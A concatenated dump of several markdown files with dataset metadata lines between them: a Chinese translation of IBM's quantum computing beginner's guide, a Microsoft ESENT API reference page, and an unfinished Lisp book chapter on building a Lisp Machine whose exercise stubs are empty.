## Thanks rvagg
This tutorial was built using rvagg's [workshopper](https://github.com/rvagg/workshopper) framework.
## Licence
MIT
| 32.021739 | 193 | 0.748133 | eng_Latn | 0.989764 |
6102b9f4b2b3343e74eb7f5a87c496683735213b | 13,829 | md | Markdown | Beginners Guide.md | Urinx/QuantumComputing | 3b2f9719ddca989bda4913db017f7728d47f9297 | [
"Apache-2.0"
] | 4 | 2018-11-05T13:16:40.000Z | 2020-06-20T07:24:26.000Z | Beginners Guide.md | Urinx/QuantumComputing | 3b2f9719ddca989bda4913db017f7728d47f9297 | [
"Apache-2.0"
] | null | null | null | Beginners Guide.md | Urinx/QuantumComputing | 3b2f9719ddca989bda4913db017f7728d47f9297 | [
"Apache-2.0"
] | null | null | null | # 初学者指南
- 介绍
- 开始
- 直方图表示(条状图)
- 量子比特 (Qubit) 奇怪又奇妙的世界
- 单量子比特门 (Single-Qubit Gates)
- 产生叠加态 (Superposition)
- 量子比特相位 (qubit phase) 介绍
- 量子门总结
- 多量子比特门
- 量子纠缠 (Entanglement)
- 贝尔和GHZ测试
- 贝尔和GHZ测试(续)
- GHZ测试量子实验结果
## [介绍](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=002-Introduction~2F001-Introduction)
我们正处于信息革命新阶段的开端。第一阶段始于1950年左右,那时有一些昂贵的房间大小的计算机,仅供专家使用。今天,世界上有比人还要多的计算机,从通信到交通,商业和互联网,我们几乎所有事情都依赖计算机。我们所有的计算机的各种能力都是通过使用简单的操作如**与**,**或**和**非**(AND,OR,NOT)来操纵 0 和 1,这些操作也被称为逻辑门。通过在数十亿个地方每秒数十亿次的运算,让我们的世界以我们习以为常的方式运转。
35年来,IBM一直在研究一种完全不同的信息和信息处理方式,就像书中的梦想一样与普通的“经典”信息不同。与梦想不同,这种称为量子信息的新信息既易于理解又有用。量子信息的基本单位称为**量子比特**(qubit,发音为CUE-bit),用于存储和处理量子比特的机器称为**量子计算机**。多年来,我们一直在构建和测试功能越来越强大的量子计算机,去年我们在约克镇实验室安装了一个 5 量子比特的量子计算机,通过互联网向公众提供。换句话说,你现在手边就有一个可编程的量子计算机。我们很快就会升级我们的公共量子计算机,但即使是五个量子比特也足以让人进行量子计算。
量子理论是在20世纪初期发展起来,通过成功地解释像原子和电子这样的微小粒子的奇怪行为,彻底改变了物理学和化学。在二十世纪后期,人们发现它不仅适用于这些粒子,而且适用于信息本身。这导致了信息处理科学技术的革命,为新型计算和通信打开了大门。
通过本初学者指南,我们希望您将了解量子计算的不同之处,以及它开辟的新可能性。其中一些可能包括设计新材料和药物,更快地数据库搜索,以及用目前不可能的方式以惊人效率解线性方程组。要做到这一切,量子计算机将使用量子世界的两个基本属性:**叠加**(superposition)和**纠缠**(entanglement)。
所以,什么是**叠加**?量子比特可以处在 $\lvert 0 \rangle$ 态,$\lvert 1 \rangle$ 态,或者两者的线性组合(叠加)。与通常的比特表示不同的是,半角括号表示法(狄拉克标记) $\lvert \rangle$ 很方便的用来表示量子比特。当你测量 $\lvert 0 \rangle$ 量子态时,你得到一个经典的 0,当你测量 $\lvert 1 \rangle$ 量子态时,你得到一个经典的 1。在量子计算的许多物理实现中 $\lvert 0 \rangle$ 态有时被称为基态,包括我们的,因为它处在最低能量态中。
现在说说**纠缠**。纠缠是许多量子叠加的特性,并没有经典的类比。在一个纠缠态中,整个系统可以被明确地描述出来,尽管不能描述其部分。观察两个处于纠缠的量子比特的其中一个会导致其行为随机,但是却能精确地告诉观察者在同样的观察下另一个量子比特如何行为。纠缠包含了两个量子比特之间独立随机行为的一种关联,所以不能被用来发送消息。一些人称之为“远距离瞬时作用”,但是这只是用词不当。这里没有作用,而是关联;只有在两次测量后比较观察的结果才能检测两量子比特结果之间的关联。量子计算机拥有处于纠缠态的能力是它们额外计算能力的主要原因,也是许多其他的量子信息处理的功能,这些功能无法通过经典方式执行甚至描述。
想要学习更过关于叠加和纠缠的概念,可以看演员保罗·拉德在量子国际象棋游戏中击败史蒂芬·霍金的[视频](https://www.youtube.com/watch?v=Hi0BzqV_b44)。游戏规则见[这里](https://www.youtube.com/watch?v=jJoDKHKE2gA),你也可以[观看](https://www.youtube.com/watch?v=LikdmXfWO2A&t=24s)游戏的发明者 Chris Cantwell,与国际象棋大师 Anna Rudolf 进行的一场友好的对局。
如果你想了解更多以上这些概念的数学和理论,我们鼓励你深入了解我们的完整用户指南。
## [开始](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=003-Getting_Started~2F001-Getting_Started)
**Quantum Composer**(量子作曲家)是一个用于编程量子处理器的图形化用户界面。可以将其视为一种使用定义好的测量和门(改变量子比特状态的操作)来构建量子算法的工具。
通过本指南,你将会尝试许多不同的实验(也可以自己探索)。当你第一次单击 “Composer” 选项卡时,你将命名你的实验,并选择是在真正的量子处理器或是自定义的量子处理器(模拟器)上运行。如果选择自定义,你需要选择实验中量子比特的位数和经典寄存器中的比特位数(你可以保持其与量子比特位数相同)。在真实量子处理器中,量子比特之间可能的连接受实验设置的限制;由于实验缺陷,测量中也存在一些误差。然而在模拟的量子处理器中,量子门可以放置在任何地方。虽然没有实验错误,但你仍然会发现出现随机结果,这是由于量子信息的性质。在本指南中,我们将展示在模拟处理器上运行实验的结果(以避免由于实验误差产生的偏差给你带来的混淆)。我们建议你在自定义和真实的处理器上进行一些实验,以便了解其差异。
Composer 使你能够创建量子曲谱(quantum score)—— 不是运动比赛中的分数,而是指音乐意义上的。在量子曲谱中,就像音乐一样,时间从左到右进行。每条线代表一个量子比特(以及该量子比特随时间发生的变化)。与音符一样,每个量子比特具有不同的频率。量子算法(线路)首先准备好量子比特的态(例如,下面的图片中的 “$\lvert 0 \rangle$”),然后从左到右按时间执行一系列单量子和双量子比特门操作。

量子门由方框表示;它们播放不同长度,幅度和相位的频率。这些被称为单量子比特门。要将门应用于量子比特,只需将门拖到量子比特线谱上。双击方框或将其拖到垃圾箱即可删除。
一旦你使用所需的门和测量填充了线谱,单击 “Run”(仅适用于真实处理器)或 “Simulate” 就可以生成实验结果。每个线路必须以测量门结束才能运行实验。
**单量子比特测量:**

在上面的例子中,我们创建了一个单量子曲谱和一个寄存器中的经典比特。我们测量了量子比特 “0” 并将测量结果存储在经典位寄存器的第 0 个位置(曲谱下面标记为 “c” 的线)。
在执行量子测量之后,量子比特的信息变成经典比特,这意味着它失去了叠加和纠缠的量子特性。每个量子比特在测量中取值要么是 0,即量子比特在 $\lvert 0 \rangle$ 态下测量;或者 1,即量子比特在 $\lvert 1 \rangle$ 态下测量。有时你的量子比特有相同的概率是 $\lvert 0 \rangle$ 或 $\lvert 1 \rangle$,例如当它处于均等的叠加态时。在这种情况下,当你在真实设备上重复许多次实验(在 Simulate 的下拉菜单中称之为 “shots”,即1024次),你会发现有一半时候你测量得到 0 另一半时候测量为 1。
在 IBM Q Experience 中,你的量子曲谱结果以标准直方图/条形图表示形式显示。
## [直方图表示(条状图)](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=003-Getting_Started~2F002-Histogram_representation_(Bar_graph))
在直方图/条状图表示中,每个柱条下面的 01 组合代表测量的量子比特态,高度则代表的是在不同的多次实验中该结果出现的频率。注意的是你用到的量子比特越多,表示结果用到的 01 就越多。为了节省空间,那些没有出现的结果在直方图中将被忽略,并且一些低频率的结果可能被合并放到标签为 “other values” 的条柱上。
**3-量子比特测量,基态**


**3-量子比特测量,全叠加态**


## [量子比特奇怪又奇妙的世界](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=004-The_Weird_and_Wonderful_World_of_the_Qubit~2F001-The_Weird_and_Wonderful_World_of_the_Qubit)
量子比特是由两个能级组成的量子系统,标记为 $\lvert 0 \rangle$ 和 $\lvert 1\rangle$。$\lvert 0 \rangle$ 态经常被称为基态因为其在两个能量中更低的一个。$\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ 一起组成所谓的 “标准基向量”。如所有向量一样,它们指向一个方向并具有一定的幅度。定义基向量是我们借用线性代数的一个非常有用的技巧。 基本思想是,一旦定义了这些向量,就可以从基向量的线性组合构造任何其他向量。
另外,量子比特也有 “相位”,那是因为叠加态比较复杂。为了表示这些叠加态,我们在态前面加上系数 $a$ 和 $b$,就像:$a \lvert 0 \rangle + b \lvert 1 \rangle$。这里公式说的是:“态是由 $\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ 的线性组合构成,其中每个部分的比例取决于系数 $a$ 和 $b$ ”。系数 $a$ 和 $b$ 可能是正的,负的,甚至是复数。如果我们取 $a$ 和 $b$ 的绝对值然后平方(即 $\lvert a \rvert ^ 2$ 或 $\lvert b \rvert ^ 2$),我们可以得到测量出 0 或 1 结果的概率。
基本态 $\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ 以及它们的线性组合 $a \lvert 0 \rangle + b \lvert 1 \rangle$ 描述了单个量子比特的状态。但是,因为系数 $a$ 和 $b$ 不仅仅是实数,也可能是虚数甚至复数,所以可视化量子比特需要一个叫做 **Bloch Sphere** 的特殊工具。Bloch Sphere(布洛赫球)是一个半径为 1 的球面,其表面上的一个点代表一个量子比特的态。就像地球使用经度和纬度来描述表面上的点一样,Bloch Sphere 也可以使用角度来描述量子比特的态。这种表示允许任何量子态,包括那些复系数。Bloch Sphere 表面上沿 X ,Y 或 Z 轴的点对应于如下所述的特殊状态。

量子态由图中的橙色线表示。在图中,球顶的态代表 $\lvert 0 \rangle$,球底的态代表 $\lvert 1 \rangle$。
当量子比特处在 $\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ 的叠加态时,向量将指向这两点之间的某处(即角度 $\theta$ 在 0 到 180 度,或 $\pi$ 弧度之间)。
球上我们还有另外一个自由度:绕着 Z 轴的转动,这个用角度 $\phi$ 描述。当 $\phi$ 不为 0 时,表明量子比特的相位有改变。Bloch Sphere 描述仅用来表示单个量子比特。出于示意图的目的,我们假设 Bloch 向量的长度等于 Bloch 球的半径。
## [单量子比特门](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F001-Single-Qubit_Gates)
正如经典计算机通过操纵比特 0 和 1 来执行计算一样,我们操纵量子比特以在量子计算机上执行计算。在本节中,我们将向你展示如何使用一些重要的单量子比特门。
要了解这些如何在数学上操作,请查看完整的用户指南。
### X 门
让我们从 X 门开始,通常被称为 “位翻转” ,因为它将 0 翻转为 1,反之亦然。

它也被称为 X 轴旋转,因为它将态向量围绕 X 轴旋转 $\pi$ 弧度。如果你从 Bloch 球的顶部的 $\lvert 0 \rangle$ 开始,X 门将你旋转到 Bloch 球底部( $\lvert 1 \rangle$ )。请参阅下面的原理图,并使用下面的量子曲谱在 Composer 中尝试 X 门。



## [产生叠加态](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F002-Creating_superposition)
现在我们知道怎么转换 $\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ ,那就让我们探索叠加态,其概念就是产生一个由基态 $\lvert 0 \rangle$ 和 $\lvert 1 \rangle$ 组成的新的量子态。为了实现叠加态,我们将扩展我们的量子门以包括 H 门。在 Quantum Composer 中,用标记为 H 的蓝色方形表示。

将 H 门,也称作 Hadamard 门,放到其中一个量子比特(其处于 $\lvert 0 \rangle$ 态)上面然后进行标准测量。你发现那个量子比特是一半时间表现为 $\lvert 0 \rangle$ ,一半时间为 $\lvert 1 \rangle$ 吗?在测量使得量子比特选择一种终态之前,量子比特的态既不是 $\lvert 0 \rangle$ 也不是 $\lvert 1 \rangle$ ,而是一种独特的量子态——叠加态,由相等权重的两种态组合而成。一个特例就是当 H 门应用到 $\lvert 0 \rangle$ 态得到的叠加态我们定义为:$\vert + \rangle = \frac{1}{\sqrt{2}}(\lvert 0 \rangle + \lvert 1 \rangle)$。这个我们叫做 $\lvert + \rangle$ 的新态有 1/2 的概率给出结果 0,1/2 的概率给出结果 1。你可以认为 H 门操作是绕着 X+Z 轴的旋转,如下图虚线所示。这个是叠加态的标准表示,**在 Bloch 球上沿 +X 轴指向**。


下面示例的一个直方图显示了运行上述量子线路 100 次的结果。 虽然平均而言我们期望这个线路以相同的概率产生0和1,但是任何有限的试验都不可能准确地产生这个结果,正如100个公平的硬币投掷通常不会恰好产生50个正面和50个反面。

与 $\vert + \rangle$ 一起的还有 $\vert - \rangle = \frac{1}{\sqrt{2}}(\lvert 0 \rangle - \lvert 1 \rangle)$,它是在 Bloch 球上沿 -X 轴指向的向量,我们可以定义一个新的基叫做叠加基(superposition basis)。 $\vert - \rangle$ 态通过下面的线路得到。首先 X 门将 $\lvert 0 \rangle$ 翻转成 $\lvert 1 \rangle$ ,然后通过 H 门将其绕 X+Z 轴方向旋转得到 $\vert - \rangle$ 态。当你运行该线路你会发现,就像前面一样,输出结果是均等的。不同的态给出相同的结果。



当你沿着标准的 Z 轴测量(这是我们通过 Z 测量门能够获取的唯一方向)时,我们不能够获取量子比特的相位信息。
为了能够区分这两者, $\vert + \rangle$ 和 $\vert -\rangle$ ,我们需要在叠加基上测量。实验上,我们不能在 Bloch 球上沿着不同的方向物理测量;然而,我们可以使它看上去像我们改变了测量方式,通过在进行标准测量(只能沿 +Z 轴)前使用量子门旋转量子比特态。为了能沿 X 基测量,我们旋转量子比特态向量直到原来指向 X 轴的部分现在指向 +Z 方向,通过在测量前加上 Hadamard 门来完成。

沿 X 基测量 $\vert + \rangle$ :


沿 X 基测量 $\vert - \rangle$ :

试试上面的在 X 基上对叠加态 $\vert + \rangle$ 和 $\vert -\rangle$ 的测量。你会发现 100% 结果是 0 和 1。也就是说,我们如果采取标准基(Z)测量,结果就会是完全随机。但是,在 X 基上,有确定的输出结果。
## [量子比特相位介绍](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F005-Introducing_qubit_phase)
现在我们已经见到如何产生 $\lvert 0 \rangle$,$\lvert 1 \rangle$,和叠加态,让我们研究一些如何改变叠加态的相位。我们加上以下这些门:$Z$,$S$,$S^\dagger$,$T$,和 $T^\dagger$。

$Z$ 门是绕着 Z 轴旋转 $\pi$ 弧度,$S$ 门是绕着 Z 轴旋转 $\frac{\pi}{2}$ 弧度,$T$ 门是绕着 Z 轴旋转 $\frac{\pi}{4}$ 弧度。$S^\dagger$ 门是 $S$ 门的逆操作(绕着 Z 轴旋转 $-\pi$ 弧度;$SS^\dagger$ 返回原状态),同理 $T^\dagger$ 是 $T$ 的逆操作。这些旋转使得量子比特在 Bloch 球的 Y 轴上有一个分量,其是量子态里复数信息的表示。
当量子比特是 $\lvert 0 \rangle$ 态时,Z 门没有作用。但是当量子比特是 $\lvert + \rangle$ 态时,你会看到 Z 门将 $\lvert + \rangle$ 翻转到 $\lvert - \rangle$ 。
**Z 门:当量子比特为 $\lvert 0 \rangle$ 态**


**Z 门:当量子比特为 $\lvert + \rangle$ 态**


现在让我们看看绕 Z 轴旋转到中间部分的,初始态是 $\lvert + \rangle$ 叠加态。以下总结了围绕 Z 轴的不同旋转如何影响叠加基上的测量结果。


## [量子门总结](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F006-Summary_of_quantum_gates)


## [多量子比特门](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=006-Multi-Qubit_Gates~2F001-Multi-Qubit_Gates)
多个量子比特的状态标记与我们前面一直使用的相似,就是在 $\lvert \rangle$ (ket)符号里有更多的数字。对于两位量子比特处理器,该比特可以处在四个可能的态上:$\lvert 00 \rangle$,$\lvert 01 \rangle$,$\lvert 10 \rangle$ 和 $\lvert 11 \rangle$。按照从左到右的顺序,第一个数字代表第二个量子比特态,第二个数字代表第一个量子比特态。也就是说:**第一个量子比特(q0)总是在最右边**。我们选择这个标记是为了与经典的二进制表示一致。就像单量子比特一样,多量子比特也有叠加态,比如:$\frac{1}{\sqrt{2}}(\lvert 00 \rangle - \lvert 11 \rangle)$。当这个态被测量时,两个量子比特会有一样的值,50% 的时候都是 0,50% 的时候都是 1。
为了做一些有趣的事情并且利用量子世界中的那些构造,我们需要在量子比特之间执行条件逻辑(*conditional* logic)门,这意味着一个量子比特的状态取决于另一个量子比特的状态。
我们要用到的条件门是 Controlled-NOT,简写 CNOT。用下图中的元素表示:

CNOT 门作用到标准基上的态时,仅当控制比特为 $\lvert 1 \rangle$ 才会反转目标比特(作用 NOT 操作或是 X 门);除此之外不做任何操作。
下面是 CNOT 门如何转变两量子比特(**第一个量子比特——即最右边的——是控制位**):

尝试下面不同输入的 CNOT 线路例子。拖拽 CNOT 门到目标比特上然后点击控制比特来连接两者。
**CNOT(输入00)**

**CNOT(输入01)**

**CNOT(输入10)**

**CNOT(输入11)**

## [量子纠缠](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F001-Entanglement)
我们现在来看纠缠,是所有量子现象里面最奇怪的。两个或多个量子物体缠绕在一起时,尽管相距太远而不能相互影响,但它们的行为表现为1) 单体随机,2) 但也有强关联——这个可以通过假设每个物体独立于另一个来解释。
纠缠态是一种由多个量子比特组成但不能列出各个量子比特的状态。比如,这些量子态:$\lvert 00 \rangle$,$\lvert 01 \rangle$,$\lvert 10 \rangle$ 和 $\lvert 11 \rangle$,没有一个是纠缠的因为它们都能被明确的表述出每个量子比特的状态。同样,$(\lvert 00 \rangle + \lvert 01 \rangle)/\sqrt{2}$ 也不是纠缠态,因为它可以被表述为第一个量子比特处于叠加的单量子态 $(\lvert 0 \rangle + \lvert 1 \rangle)/\sqrt{2}$,第二个处于 $\lvert 0 \rangle$ 态。然而,$(\lvert 01 \rangle + \lvert 10 \rangle)/\sqrt{2}$ 是纠缠的,因为无法描述单个量子比特的状态。当你测量这个态的一个量子比特时,不管沿着哪个轴测量,它的行为都是随机的,但是其随机的行为却能让你精确的预测出另一个量子比特在同样测量条件下的行为。没有任何非纠缠态能够表现出这样的完美个体随机性与完美关联的结合。
两个 Bell 态(纠缠态)例子:




有些人可能会发现这很难相信。 我们的经典直觉认为,直到测量前两个粒子不是存在于两个状态的叠加中,而是其中一个粒子一直是 1 而另一个是 0。 这被称为 “局部隐变量”(local hidden variable) 理论。
## [贝尔和GHZ测试](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F002-Bell_and_GHZ_Tests)
为了最终解决上面说到的这个问题,John Bell 设计了一个实验叫贝尔测试(这个后来被扩展到 CHSH 不等式)。他意识到沿同一轴(例如 Z 方向)测量两个纠缠的量子比特总是给出互补的响应,但这可能有一个经典的解释(即预先确定结果的具体规则)。相反,贝尔意识到他可以沿不同方向对两个量子比特进行测量然后统计结果,可以用来说明粒子的行为不是经典的。描述这个工作需要了解统计学,所以这里我们不这样进行下去。相反,我们将引入更先进的多量子比特纠缠态。
让我们假设现在有三个,而不是两个量子比特。我们准备了一个所有量子比特处于全是 0 和 1 的叠加态:$\frac{1}{\sqrt{2}}(\lvert 000 \rangle - \lvert 111 \rangle)$。这个态称为 GHZ 态。GHZ 态名字来源于 Greenberger、Horne 和 Zeilinger,因为在 1997 年他们是第一个研究这个态的。通过对这个态进行一系列的测量,我们能够证明这种态违反了大多数人认为是关于我们世界的 “真理” 的某些假设。
经典地,粒子(在我们的例子中是量子比特)在测量时只能有两个结果中的一个—— 0 或 1。此外,如果它们是经典粒子,可能存在 “隐变量” 在测量前提前决定了结果。为了展现 GHZ 态的量子性质,并且证明没有所谓的隐变量存在,我们需要考虑沿不同基(X 和 Y)测量的可能结果的不同组合(称为关联)。这个详细地记录在 N. David Mermin 在 1990 年的论文《What’s wrong with these elements of reality?》中。

想象你有三个独立的系统,用蓝色,红色和绿色方框表示。你现在要解决以下问题:在每个框中有两个问题,标记为 X 和 Y,每个问题只有两个可能的结果,1 或 -1。这三个系统可能是三个纠缠的 GHZ 态量子比特。我们想仔细检查量子比特之间的关联。
为了这个例子的目的,我们将 $\lvert 0 \rangle$ 态映射到数字 1,$\lvert 1 \rangle$ 态到数字 -1,而不是映射 $\lvert 0 \rangle$ 态到数字 0,$\lvert 1 \rangle$ 态到数字 1(这个避免我们在过程中乘以 0 而丢失信息)。每个量子比特的测量结果是 1 或 -1,我们将结果相乘然后观察关联。
这里讲讲如何标记符号。让我们假设三个量子比特处于 $\lvert 000 \rangle$ 态。当我们在 Z 轴测量它们三个时,我们用 ZZZ 表示这个量子测量。根据上面定义的映射,结果将是 1、1、1 并且相乘后 ZZZ 是 1。如果是态 $\lvert 001 \rangle$,则进行 ZZZ 测量结果是 -1。
为了在其他基上测量,比如 XXX,我们需要在测量前对这些比特进行量子门操作旋转它们到 Z 轴。对于 XXX,意味着测量前需要给每个量子比特进行 Hadamard 门操作。我们也能对三个量子比特进行下面的测量和结果:

译者注:如果看了上面的内容感觉还是不太明白的话,可以看看这篇讲解的深入浅出的文章,[量子力学背后的数学复杂吗?](https://mp.weixin.qq.com/s/YRjZU1giwfJoJQavN6R9oA)。
## [贝尔和GHZ测试(续)](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F003-Bell_and_GHZ_Tests_(Cont.))
这里我们来展现我们经典的直觉是错误的。
假设我们不是在量子系统上进行量子测量,而是在类似的 “经典” 系统上进行 “经典” 测量。为了区分两者,我们在经典系统上沿 X 方向的测量记为 “$M_X$”,Y 方向记为 “$M_Y$”。如果每个量子比特的结果($M_X$或$M_Y$)在测量前就已经确定了,则我们可以把 “1” 或 “-1” 代入每个量子比特测量结果 $M_X$ 和 $M_Y$ 里面(尽管我们还不知道到底是 1 还是 -1)。因此下面任意一个都代表着 3 个量子比特的测量,我们需要沿着一列从上到下乘起来得到单个量子比特的结果(这里仍然假设结果是提前确定的并且相互独立)。

让我们相乘其中一列,比如,第 3 个量子比特。如你所见,我们得到 $M_X * M_Y * M_Y$。我们已经知道这些测量结果只能是两者中的一个:1 或 -1。也就是说,$M_Y * M_Y$ 的值是 1。所以,这个表达式可以简写为 $M_X$。当我们对所有列这样做时,我们可以发现以上等式可以等价于 $M_{X,Q3}M_{X,Q2}M_{X,Q1} = 1$。这个就是我们将会得到的结果,如果系统是经典的。然而,**量子力学和实验**都告诉我们对 GHZ 态的 XXX 测量结果是 $XXX = -1$!
基于这些实验的结果,我们不得不接受量子力学告诉我们的:每个独立于另外两个的量子比特态里没有隐藏的信息,使其在 X 和 Y 测量之前就确定了结果。任何给定量子比特的 X 或 Y 测量结果基本上与它所纠缠的量子比特的 X 或 Y 测量结果有关。比如,如果在量子比特 2 和 3 上的 Y 测量结果是 +1,则量子比特 1 上的 X 测量结果会是 +1。如果在量子比特 2 和 3 上的 X 测量结果是 +1,则量子比特 1 上的 X 测量结果会是 -1。奇怪但却是对的!
## [GHZ测试量子实验结果](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F004-Results_from_the_GHZ_test_in_the_Quantum_Experience)
令人惊讶的是,我们可以在 Quantum Experience 中通过创建 GHZ 态来测试这一点,对三个量子比特应用量子门以使它们处于叠加和纠缠状态,并执行上述测量组合。当我们沿着 X 基测量这三个量子比特时,对比于我们沿 Y 基测量的前两个量子比特和沿 X 基测量的第三个量子比特,我们得到了等价于 “-1” 的情况。
我们的观察结果告诉我们,系统的行为正如量子力学预测的那样,而不是我们经典直觉预测的那样!

再次注意:如果我们在标准基上测量(沿 Z),我们只得到 000 和 111。 下表中的噪声(小误差)来自实验误差,因为我们使用的是真正的量子处理器,这是不完美的。
 | 48.522807 | 495 | 0.766361 | yue_Hant | 0.583996 |
61031d74be811c323279052379037cc0e0688325 | 1,553 | md | Markdown | desktop-src/extensible-storage-engine/windows7grbits.columncompressed-field.md | velden/win32 | 94b05f07dccf18d4b1dbca13b19fd365a0c7eedc | [
"CC-BY-4.0",
"MIT"
] | 552 | 2019-08-20T00:08:40.000Z | 2022-03-30T18:25:35.000Z | desktop-src/extensible-storage-engine/windows7grbits.columncompressed-field.md | velden/win32 | 94b05f07dccf18d4b1dbca13b19fd365a0c7eedc | [
"CC-BY-4.0",
"MIT"
] | 1,143 | 2019-08-21T20:17:47.000Z | 2022-03-31T20:24:39.000Z | desktop-src/extensible-storage-engine/windows7grbits.columncompressed-field.md | velden/win32 | 94b05f07dccf18d4b1dbca13b19fd365a0c7eedc | [
"CC-BY-4.0",
"MIT"
] | 1,287 | 2019-08-20T05:37:48.000Z | 2022-03-31T20:22:06.000Z | ---
description: "Learn more about: Windows7Grbits.ColumnCompressed field"
title: Windows7Grbits.ColumnCompressed field (Microsoft.Isam.Esent.Interop.Windows7)
TOCTitle: ColumnCompressed field
ms:assetid: F:Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
ms:mtpsurl: https://msdn.microsoft.com/library/microsoft.isam.esent.interop.windows7.windows7grbits.columncompressed(v=EXCHG.10)
ms:contentKeyID: 55104262
ms.date: 07/30/2014
ms.topic: reference
f1_keywords:
- Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
dev_langs:
- CSharp
- JScript
- VB
- other
api_name:
- Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
topic_type:
- apiref
- kbSyntax
api_type:
- Managed
api_location:
- Microsoft.Isam.Esent.Interop.dll
ROBOTS: INDEX,FOLLOW
---
# Windows7Grbits.ColumnCompressed field
Compress data in the column, if possible.
**Namespace:** [Microsoft.Isam.Esent.Interop.Windows7](./microsoft.isam.esent.interop.windows7-namespace.md)
**Assembly:** Microsoft.Isam.Esent.Interop (in Microsoft.Isam.Esent.Interop.dll)
## Syntax
``` vb
'Declaration
Public Const ColumnCompressed As ColumndefGrbit
'Usage
Dim value As ColumndefGrbit
value = Windows7Grbits.ColumnCompressed
```
``` csharp
public const ColumndefGrbit ColumnCompressed
```
## See also
#### Reference
[Windows7Grbits class](./windows7grbits-class.md)
[Windows7Grbits members](./windows7grbits-members.md)
[Microsoft.Isam.Esent.Interop.Windows7 namespace](./microsoft.isam.esent.interop.windows7-namespace.md)
| 25.459016 | 128 | 0.799099 | yue_Hant | 0.913278 |
610387b7a260674906fb1526ea30f1dfe359edd3 | 5,141 | md | Markdown | book/3-22-00-lisp-machine.md | halcyon/llthw | c845b0835bfa6852637aa9b696d0d1e9bbf0308d | [
"MIT"
] | 275 | 2015-01-08T01:14:59.000Z | 2021-01-22T04:17:19.000Z | book/3-22-00-lisp-machine.md | halcyon/llthw | c845b0835bfa6852637aa9b696d0d1e9bbf0308d | [
"MIT"
] | 31 | 2015-01-10T16:29:55.000Z | 2020-12-09T01:02:48.000Z | book/3-22-00-lisp-machine.md | halcyon/llthw | c845b0835bfa6852637aa9b696d0d1e9bbf0308d | [
"MIT"
] | 61 | 2015-01-08T14:38:25.000Z | 2021-01-18T18:03:45.000Z | <ol class="breadcrumb">
<li><a href="/">Home</a></li>
<li><a href="/book/">Book</a></li>
<li><a href="/book/3-00-00-overview/">Part Three: Lisp So(u)rcery</a></li>
<li class="active">Build Your Own Lisp Machine</li>
</ol>
## Chapter 3.22
# Build Your Own Lisp Machine
> "Revolution is an art that I pursue rather than a goal I expect to achieve. Nor is this a source of dismay; a lost cause can be as spiritually satisfying as a victory."
> <footer>Robert A. Heinlein, <em>The Moon Is a Harsh Mistress</em></footer>
**Note:** *the exercises in this chapter will require specialized hardware components to complete, and due to the prohibitive cost and lack of availability for some readers, it should be considered optional*.
Few topics capture the imagination of budding Lisp Hackers more than the legendary Lisp Machines of the 70s and 80s---the first personal workstations in a world of time-shared, multi-user mainframes, with a fully integrated and interactive hardware and software environment, that seemed to offer unrivaled competitive-edge for the team that could afford them. Unfortunately, with the rise of IBM-Compatible Personal Computers, available at a fraction of the cost, the highly specialized and costly Lisp Machines were the first casualties of the AI Winter. But the dream of the Lisp Machine has never died.
Back in the 80s, there were a significant number of competing architectures, the various Lisp Machine chipsets being only a small number of them; but over the past 30 years, there has been a significant push by Intel to be the dominant architecture through a process of generalization---by developing a processor architecture that was more generally useful to multiple platforms and purposes, instead of being specialized, they were able to cater to more users and rapidly seize control of the largest market share---even going so far as to partner with Apple, to unify the underlying, previously competing architectures of Macintosh and IBM-Compatible PCs.
But over the past decade, there has been a shift back towards specialized hardware, heavily prompted by the Internet-of-Things movement and the surprising success of mobile devices and smartphones. These days, reprogrammable hardware is available for little more than a full professional workstation, and once a chipset design has been tested extensively on an FPGA-based board, it can be ported to an ASIC design for microfabrication by a host of companies with competitive rates. These days, pretty much anyone can design, test, and implement a custom computer architecture, and get their design built and shipped to their front door as a big wafer. In one sense, it's a little silly, since this plethora of home-built architectures means more and more platforms exist, for which there is no compatible software or compilers---but combined with a sensible use of an existing standard instruction set, it does make for a powerful toolchain for the home inventor.
As we have already covered in previous chapters, it's common knowledge that Lisp can be defined in Lisp---so it stands to reason to also implement the architecture of a Lisp Machine in Lisp, that can be output to the synthesizable Verilog code that will be written to the FPGA or used to fabricate an ASIC. And by implementing the core constructs of the language as the machine language of a Lisp Machine, you eliminate one of the most troublesome aspects of compiler design and optimization.
This chapter will contain a review of available FPGA-based boards and ASIC manufacturers; a brief primer on synthesizable Verilog, and a DSL for producing Verilog/VHDL from Common Lisp source-code; and a schema for a 64-bit Lisp Machine. As an extra credit exercise, we will modify an existing Common Lisp implementation to run directly on this Lisp Machine and use it as the basis for a LispOS for your new Lisp Machine.
## Exercise 3.22.1
**Hardware Prototyping and Fabrication**
```lisp
```
## Exercise 3.22.2
**Field Programmable Gate Arrays**
```lisp
```
## Exercise 3.22.3
**Application-Specific Integrated Circuits**
```lisp
```
## Exercise 3.22.4
**Prototyping CPUs**
```lisp
```
## Exercise 3.22.5
**Synthesizable Verilog**
```lisp
